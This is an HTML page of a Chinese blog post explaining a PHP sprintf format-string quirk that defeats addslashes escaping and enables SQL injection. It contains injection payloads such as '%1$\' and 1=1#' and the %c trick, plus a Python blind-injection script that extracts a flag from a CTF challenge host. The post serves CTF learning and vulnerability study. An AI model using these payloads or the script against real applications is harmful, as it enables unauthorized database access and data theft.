<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Lobster Two:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="web安全,">










<meta name="description" content="原理sprintf()把百分号（%）符号替换成一个作为参数进行传递的变量： 123456&amp;lt;?php$number = 2;$str = &quot;Shanghai&quot;;$txt = sprintf(&quot;There are %u million cars in %s.&quot;,$number,$str);echo $txt;?&amp;gt; 运行结果1There are 2 million cars in Shan">
<meta name="keywords" content="web安全">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP sprintf格式化字符串漏洞">
<meta property="og:url" content="https://style-404.github.io/2019/04/19/PHP-sprintf格式化字符串漏洞/index.html">
<meta property="og:site_name" content="可乐&#39;blog">
<meta property="og:description" content="原理sprintf()把百分号（%）符号替换成一个作为参数进行传递的变量： 123456&amp;lt;?php$number = 2;$str = &quot;Shanghai&quot;;$txt = sprintf(&quot;There are %u million cars in %s.&quot;,$number,$str);echo $txt;?&amp;gt; 运行结果1There are 2 million cars in Shan">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g281m9qmayj30d605omxg.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g27znox1u3j30ql0gnq3s.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g27zuu2rx9j30qr0fd3z8.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g280cueav7j30v60h6406.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g280l04clnj30x70hjgn1.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g280yj6qcuj30ul0byglz.jpg">
<meta property="og:updated_time" content="2019-05-17T07:20:20.125Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="PHP sprintf格式化字符串漏洞">
<meta name="twitter:description" content="原理sprintf()把百分号（%）符号替换成一个作为参数进行传递的变量： 123456&amp;lt;?php$number = 2;$str = &quot;Shanghai&quot;;$txt = sprintf(&quot;There are %u million cars in %s.&quot;,$number,$str);echo $txt;?&amp;gt; 运行结果1There are 2 million cars in Shan">
<meta name="twitter:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g281m9qmayj30d605omxg.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://style-404.github.io/2019/04/19/PHP-sprintf格式化字符串漏洞/">





  <title>PHP sprintf格式化字符串漏洞 | 可乐'blog</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">可乐'blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-schedule">
          <a href="/schedule/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-calendar"></i> <br>
            
            日程表
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://style-404.github.io/2019/04/19/PHP-sprintf格式化字符串漏洞/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="筱阳">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="可乐'blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">PHP sprintf格式化字符串漏洞</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-04-19T15:30:29+08:00">
                2019-04-19
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p><meta name="referrer" content="no-referrer"><br><img src="https://ws1.sinaimg.cn/large/005RaR9Jgy1g281m9qmayj30d605omxg.jpg" alt=""></p>
<h1 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h1><p>sprintf()<br>把百分号（%）符号替换成一个作为参数进行传递的变量：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">$number = <span class="number">2</span>;</span></span><br><span class="line"><span class="php">$str = <span class="string">"Shanghai"</span>;</span></span><br><span class="line"><span class="php">$txt = sprintf(<span class="string">"There are %u million cars in %s."</span>,$number,$str);</span></span><br><span class="line"><span class="php"><span class="keyword">echo</span> $txt;</span></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>
<p>运行结果<br><figure class="highlight actionscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">There are <span class="number">2</span> million cars <span class="keyword">in</span> Shanghai.</span><br></pre></td></tr></table></figure></p>
<p>定义和用法<br>sprintf() 函数把格式化的字符串写入变量中。</p>
<p>arg1、arg2、++ 参数将被插入到主字符串中的百分号（%）符号处。该函数是逐步执行的。在第一个 % 符号处，插入 arg1，在第二个 % 符号处，插入 arg2，依此类推。</p>
<p>注释：如果 % 符号多于 arg 参数，则您必须使用占位符。占位符位于 % 符号之后，由数字和 “\$” 组成。</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">$number = <span class="number">123</span>;</span></span><br><span class="line">$txt = sprintf("带有两位小数：%1\$.2f</span><br><span class="line"><span class="php">&lt;br&gt;不带小数：%<span class="number">1</span>\$u<span class="string">",$number);</span></span></span><br><span class="line"><span class="php"><span class="keyword">echo</span> $txt;</span></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>
<p>结果:<br><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">带有两位小数：<span class="number">123.00</span></span><br><span class="line">不带小数：<span class="number">123</span></span><br></pre></td></tr></table></figure></p>
<h1 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h1><p>接下来看看sprintf()的底层实现方法<br><figure class="highlight processing"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">switch</span> (format[inpos]) &#123;</span><br><span class="line"><span class="keyword">case</span> <span class="string">'s'</span>:</span><br><span class="line">    &#123;</span><br><span class="line">        zend_string * t;</span><br><span class="line">        zend_string * <span class="built_in">str</span> = zval_get_tmp_string(tmp, &amp;t);</span><br><span class="line">        php_sprintf_appendstring( &amp; result, &amp;outpos, ZSTR_VAL(<span class="built_in">str</span>), <span class="built_in">width</span>, precision, padding, alignment, ZSTR_LEN(<span class="built_in">str</span>), <span class="number">0</span>, expprec, <span class="number">0</span>);</span><br><span class="line">        zend_tmp_string_release(t);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line"><span class="keyword">case</span> <span class="string">'d'</span>:</span><br><span class="line">    php_sprintf_appendint( &amp; result, &amp;outpos, zval_get_long(tmp), <span class="built_in">width</span>, padding, alignment, always_sign);</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">case</span> <span class="string">'u'</span>:</span><br><span class="line">    php_sprintf_appenduint( &amp; result, &amp;outpos, zval_get_long(tmp), <span class="built_in">width</span>, padding, alignment);</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">case</span> <span class="string">'g'</span>:</span><br><span class="line"><span class="keyword">case</span> <span class="string">'G'</span>:</span><br><span class="line"><span class="keyword">case</span> <span class="string">'e'</span>:</span><br><span class="line"><span class="keyword">case</span> <span class="string">'E'</span>:</span><br><span class="line"><span class="keyword">case</span> <span class="string">'f'</span>:</span><br><span class="line"><span class="keyword">case</span> <span class="string">'F'</span>:</span><br><span class="line">    php_sprintf_appenddouble( &amp; result, &amp;outpos, zval_get_double(tmp), <span class="built_in">width</span>, padding, alignment, precision, adjusting, format[inpos], always_sign);</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">case</span> <span class="string">'c'</span>:</span><br><span class="line">    php_sprintf_appendchar( &amp; result, &amp;outpos, (<span class="built_in">char</span>) zval_get_long(tmp));</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">case</span> <span class="string">'o'</span>:</span><br><span class="line">    php_sprintf_append2n( &amp; result, &amp;outpos, zval_get_long(tmp), <span class="built_in">width</span>, padding, alignment, <span class="number">3</span>, hexchars, expprec);</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">case</span> <span class="string">'x'</span>:</span><br><span class="line">    php_sprintf_append2n( &amp; result, &amp;outpos, zval_get_long(tmp), <span class="built_in">width</span>, padding, alignment, <span class="number">4</span>, hexchars, expprec);</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">case</span> <span class="string">'X'</span>:</span><br><span class="line">    php_sprintf_append2n( &amp; result, &amp;outpos, zval_get_long(tmp), <span class="built_in">width</span>, padding, alignment, <span class="number">4</span>, HEXCHARS, expprec);</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">case</span> <span class="string">'b'</span>:</span><br><span class="line">    php_sprintf_append2n( &amp; result, &amp;outpos, zval_get_long(tmp), <span class="built_in">width</span>, padding, alignment, <span class="number">1</span>, hexchars, expprec);</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">case</span> <span class="string">'%'</span>:</span><br><span class="line">    php_sprintf_appendchar( &amp; result, &amp;outpos, <span class="string">'%'</span>);</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">default</span>:</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>可以看到， php源码中只对15种类型做了匹配， 其他字符类型都直接break了，php未做任何处理，直接跳过，所以导致了这个问题：<br>如果我们输入<code>&quot;%\&quot;</code>或者<code>&quot;%1$\&quot;</code>,他会把反斜杠当做格式化字符的类型，然而找不到匹配的项那么<code>&quot;%\&quot;</code>,<code>&quot;%1$\&quot;</code>就因为没有经过任何处理而被替换为空。<br><img src="https://ws1.sinaimg.cn/large/005RaR9Jgy1g27znox1u3j30ql0gnq3s.jpg" alt=""></p>
<p><img src="https://ws1.sinaimg.cn/large/005RaR9Jgy1g27zuu2rx9j30qr0fd3z8.jpg" alt=""></p>
<p>因此sprintf注入的原理就是</p>
<p>我们用一个15种类型之外的 <code>&quot;\&quot;</code>来代替格式字符类型让函数替换为空，则“%1$\’”后面的单引号就能闭合前面的单引号，以下是一些例子帮助我们更好的理解</p>
<p><strong>不带占位符的</strong><br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php"></span></span><br><span class="line"><span class="php">$sql=<span class="string">"select * from user where username='%\' and 1=1 #';"</span>;</span></span><br><span class="line"><span class="php">$user=<span class="string">'admin'</span>;</span></span><br><span class="line"><span class="php"><span class="keyword">echo</span> sprintf($sql,$user);</span></span><br><span class="line"><span class="php"></span></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure></p>
<p>运行结果：<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> username=<span class="string">''</span> <span class="keyword">and</span> <span class="number">1</span>=<span class="number">1</span> <span class="comment">#';</span></span><br></pre></td></tr></table></figure></p>
<p>注意：username=’’这里是两个单引号不是双引号</p>
<p><strong>带有占位符：</strong><br>先看不带的原样输出<br><img src="https://ws1.sinaimg.cn/large/005RaR9Jgy1g280cueav7j30v60h6406.jpg" alt=""><br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> <span class="attribute">1</span>=1#</span><br><span class="line"><span class="keyword">AND</span> <span class="attribute">b</span>=<span class="string">'and 1=1#'</span></span><br><span class="line">SELECT * <span class="keyword">FROM</span> t WHERE <span class="attribute">a</span>=<span class="string">'admin'</span> <span class="keyword">AND</span> <span class="attribute">b</span>=<span class="string">'and 1=1#'</span></span><br></pre></td></tr></table></figure></p>
<p>进行绕过<br><figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">//addslashes()函数：在预定义前面加反斜杠，预定义符有单引号（<span class="string">'），双引号（"），反斜杠（\），NULL</span></span><br><span class="line"><span class="string">$input = addslashes ("%1$'</span> <span class="keyword">and</span> <span class="number">1</span>=<span class="number">1</span><span class="comment">#" );</span></span><br><span class="line">$b = <span class="keyword">sprintf</span> (<span class="string">"AND b='%s'"</span>, $input );</span><br><span class="line">$sql = <span class="keyword">sprintf</span> (<span class="string">"SELECT * FROM t WHERE a='%s' $b "</span>, <span class="string">'admin'</span> );</span><br><span class="line">echo  $sql ;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>对$input与$b进行了拼接<br><figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$sql = <span class="keyword">sprintf</span> (<span class="string">"SELECT * FROM t WHERE a='%s' AND b='%1$\' and 1=1#' "</span>, <span class="string">'admin'</span> );</span><br></pre></td></tr></table></figure></p>
<p>很明显，这个句子里面的<code>\</code>是由addsashes为了转义单引号而加上的，使用%s与<code>%1$\</code>类匹配admin，那么admin只会出现在%s里，<code>%1$\</code>为空<br>所以输出<br><figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">%<span class="number">1</span>$\' <span class="keyword">and</span> <span class="number">1</span>=<span class="number">1</span><span class="meta">#</span></span><br><span class="line"><span class="keyword">AND</span> b='%<span class="number">1</span>$\' <span class="keyword">and</span> <span class="number">1</span>=<span class="number">1</span><span class="meta">#'</span></span><br><span class="line"><span class="built_in">SELECT</span> * FROM t <span class="built_in">WHERE</span> a='admin' <span class="keyword">AND</span> b='' <span class="keyword">and</span> <span class="number">1</span>=<span class="number">1</span><span class="meta">#'</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/005RaR9Jgy1g280l04clnj30x70hjgn1.jpg" alt=""><br>对于这个问题，我们还可以这样写<br><figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$sql = <span class="keyword">sprintf</span> (<span class="string">"SELECT * FROM table WHERE a='%1$\' AND b='%d' and 1=1#' "</span>,<span class="string">'admin'</span>);</span><br></pre></td></tr></table></figure></p>
<p>result:<br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * <span class="keyword">FROM</span> t WHERE <span class="attribute">a</span>=<span class="string">'admin'</span> <span class="keyword">AND</span> <span class="attribute">b</span>=<span class="string">''</span> <span class="keyword">and</span> <span class="attribute">1</span>=1#'</span><br></pre></td></tr></table></figure></p>
<p>第一个格式化处匹配时为空，会让给后面的格式化匹配</p>
<p>以上两个例子是吃掉’\’来使得单引号逃逸出来</p>
<p>下面这个例子我们构造单引号<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">$input1 = <span class="string">'%1$c) OR 1 = 1 /*'</span> ;</span></span><br><span class="line"><span class="php">$input2 = <span class="number">39</span> ;</span></span><br><span class="line"><span class="php">$sql = <span class="string">"SELECT * FROM foo WHERE bar IN (' $input1 ') AND baz = %s"</span> ;</span></span><br><span class="line"><span class="php"><span class="keyword">echo</span>($sql.<span class="string">"&lt;br&gt;"</span>);</span></span><br><span class="line"><span class="php">$sql = sprintf ( $sql , $input2 );</span></span><br><span class="line"><span class="php"><span class="keyword">echo</span>  $sql ;</span></span><br></pre></td></tr></table></figure></p>
<p>结果：<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> foo <span class="keyword">WHERE</span> bar <span class="keyword">IN</span> (<span class="string">' %1$c) OR 1 = 1 /* '</span>) <span class="keyword">AND</span> baz = %s</span><br><span class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> foo <span class="keyword">WHERE</span> bar <span class="keyword">IN</span> (<span class="string">' '</span>) <span class="keyword">OR</span> <span class="number">1</span> = <span class="number">1</span> <span class="comment">/* ') AND baz = 39</span></span><br></pre></td></tr></table></figure></p>
<p>%c起到了类似chr()的效果，将数字39转化为‘，从而导致了sql注入。</p>
<p>所以结果为：<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> foo <span class="keyword">WHERE</span> bar <span class="keyword">IN</span> (<span class="string">''</span>) <span class="keyword">OR</span> <span class="number">1</span> = <span class="number">1</span> <span class="comment">/*) AND baz = 39</span></span><br></pre></td></tr></table></figure></p>
<h1 id="实战"><a href="#实战" class="headerlink" title="实战"></a>实战</h1><p>i春秋的 “迎圣诞，拿大奖”活动赛题<br><a href="https://www.ichunqiu.com/battalion?t=1&amp;r=60469" target="_blank" rel="noopener">https://www.ichunqiu.com/battalion?t=1&amp;r=60469</a></p>
<p>进行fuzz时 ，当输入<code>%</code>时爆sprintf()错误<br><img src="https://ws1.sinaimg.cn/large/005RaR9Jgy1g280yj6qcuj30ul0byglz.jpg" alt=""></p>
<p>于是构造<code>username=admin%1$\&#39; and 1=2#</code>与 <code>username=admin%1$\&#39; and 1=1#</code><br>于是写下脚本：<br><figure class="highlight nix"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># _*_ coding : utf-8 _*_</span></span><br><span class="line"><span class="built_in">import</span> requests</span><br><span class="line"><span class="built_in">import</span> re</span><br><span class="line"><span class="built_in">import</span> urllib2</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="attr">headers</span> = &#123;</span><br><span class="line">'User-Agent' : 'Mozilla/<span class="number">5.0</span> (Windows NT <span class="number">10.0</span>; WOW64; rv:<span class="number">56.0</span>) Gecko/<span class="number">20100101</span> Firefox/<span class="number">56.0</span>',</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="attr">dbname</span> = <span class="string">""</span></span><br><span class="line"><span class="attr">chars</span> = '<span class="number">0123456789</span>ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'</span><br><span class="line"><span class="attr">url</span> = <span class="string">"http://00eec0b6e68b4332b078c559e3fee6307720121e6aaf49e4.changame.ichunqiu.com/"</span></span><br><span class="line">for m <span class="keyword">in</span> range(<span class="number">30</span>,<span class="number">50</span>):</span><br><span class="line">   for i <span class="keyword">in</span> range(<span class="number">32</span>, <span class="number">126</span>):</span><br><span class="line">       <span class="attr">s</span> = <span class="string">"%1$' or ascii(substr((select flag from flag),"</span>+str(m)+<span class="string">",1))="</span>+str(i)+<span class="string">"#"</span></span><br><span class="line">       <span class="comment"># str1 = urllib2.quote(s)</span></span><br><span class="line">       <span class="attr">str1</span> = s</span><br><span class="line">       <span class="attr">data=&#123;'username'</span> : str1, 'password' : '<span class="number">12313</span>'&#125;</span><br><span class="line">       <span class="comment"># print str1</span></span><br><span class="line">       <span class="comment"># print urllib2.unquote(str1)</span></span><br><span class="line">       <span class="attr">req</span> = requests.post(<span class="attr">url=url,</span> <span class="attr">data=data,headers=headers)</span></span><br><span class="line">       <span class="comment"># print req.text</span></span><br><span class="line">       <span class="comment"># print req.text</span></span><br><span class="line">       <span class="attr">result</span> = re.findall('password error', req.content)</span><br><span class="line">       <span class="keyword">if</span> result:</span><br><span class="line">           <span class="attr">dbname</span> = dbname + chr(i)</span><br><span class="line">           print dbname</span><br><span class="line">           print chr(i)</span><br></pre></td></tr></table></figure></p>

      
    </div>
    
    
    

    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div></div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechatpay.jpg" alt="筱阳 微信支付">
        <p>微信支付</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/alipay.jpg" alt="筱阳 支付宝">
        <p>支付宝</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web安全/" rel="tag"># web安全</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/04/18/2019DDCTF-Writeup/" rel="next" title="2019DDCTF-Writeup">
                <i class="fa fa-chevron-left"></i> 2019DDCTF-Writeup
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/05/08/test/" rel="prev" title="test">
                test <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
        <!-- JiaThis Button BEGIN -->
<div class="jiathis_style">
<span class="jiathis_txt">分享到：</span>
<a class="jiathis_button_fav">收藏夹</a>
<a class="jiathis_button_copy">复制网址</a>
<a class="jiathis_button_email">邮件</a>
<a class="jiathis_button_weixin">微信</a>
<a class="jiathis_button_qzone">QQ空间</a>
<a class="jiathis_button_tqq">腾讯微博</a>
<a class="jiathis_button_douban">豆瓣</a>
<a class="jiathis_button_share">一键分享</a>

<a href="http://www.jiathis.com/share?uid=2140465" class="jiathis jiathis_txt jiathis_separator jtico jtico_jiathis" target="_blank">更多</a>
<a class="jiathis_counter_style"></a>
</div>
<script type="text/javascript">
var jiathis_config={
  data_track_clickback:true,
  summary:"",
  shortUrl:false,
  hideMore:false
}
</script>
<script type="text/javascript" src="http://v3.jiathis.com/code/jia.js?uid=" charset="utf-8"></script>
<!-- JiaThis Button END -->
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
